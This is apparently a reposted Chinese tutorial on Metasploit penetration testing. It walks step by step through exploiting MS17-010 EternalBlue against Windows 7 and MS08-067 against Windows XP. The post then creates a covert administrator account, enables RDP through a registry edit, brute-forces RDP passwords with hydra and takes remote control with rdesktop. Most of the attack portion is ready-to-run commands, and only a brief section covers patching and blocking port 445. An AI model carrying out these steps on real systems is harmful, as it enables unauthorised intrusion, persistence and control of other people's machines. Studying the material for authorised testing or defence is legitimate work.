metasploit滲透測試
阿新 • • 發佈:2019-01-28
一些常用指令
msfconsole 開啟控制檯終端
msfupdate 更新
help [command] e.g. help search 命令使用幫助資訊
search […] e.g. search portscan
use … 選擇滲透攻擊模組
show payloads 檢視與該攻擊模組相相容的攻擊載荷
set payload … 設定攻擊載荷
set target 設定目標
show options 檢視需要設定的配置引數
exploit 實施滲透攻擊
metasploit滲透攻擊模組在目錄/usr/share/metasploit-framework/modules/exploits
nmap <掃描選項><掃描目標>
攻擊例項
1、利用永恆之藍(ms17_010)漏洞攻擊win7
- 開啟metasploit
msfconsole - 使用永恆之藍模組
search ms17-01
use exploit/windows/smb/ms17_010_eternalblue - 填充各種指令,主要是靶機IP,其中445埠已經默認了,其他不用改
show options
set RHOST 192.168.12.1 - 攻擊
exploit或者run - 建立新使用者,偷偷的控制使用
net user admin 123456 /add - 提權,將新建立的使用者admin提到管理員許可權
net localgroup administrators admin /add
檢視許可權:
net user admin
防禦辦法:
1,網上下載補丁,
2,關閉445埠,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
檢測445埠是否開啟:
netstat -ano -p tcp | find “445”
2、利用Windows Server服務RPC請求緩衝區溢位漏洞(ms_08067)入侵WinXP
- 在msfconsole使用search命令搜尋MS08067漏洞攻擊程式
- 使用use命令呼叫MS08067漏洞攻擊程式
use exploit/windows/smb/ms08_067_netapi - 使用show options 命令檢視需要設定的選項
可以看到還需設定RHOST(目標地址)、Exploit target(攻擊目標)
使用 set 命令設定 Module Options,此處需要設定目標IP - 接著設定Exploit target,使用show targets 檢視可選項
可以看出哪些版本的系統存在此漏洞,攻擊的XP系統為WinXP SP3 簡體中文版,即使用set target 命令設定目標,此處即為set target 34 - 此時再用show options 可以看到全部設定完成,接著使用exploit 或者 run 進行攻擊,執行exploit命令後得到一個meterpreter
- 在meterpreter中輸入shell即可進入CMD視窗
- 可以進行一些攻擊,如遠端桌面控制:
—-開啟RDP服務
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
—-使用netstat -an命令檢視埠是否開放
—-接著使用net user命令檢視XP系統中的使用者
net user
—-然後針對指定使用者比如sysorem使用者進行登入密碼爆破
hydra 172.16.211.129 rdp -l sysorem -P Desktop/pass.txt
—-使用hydra爆破密碼得:12345接著就能直接登入XP進行遠端控制
rdesktop -a 32 -u sysorem -p 12345 172.16.211.129:3389
—-完成遠端控制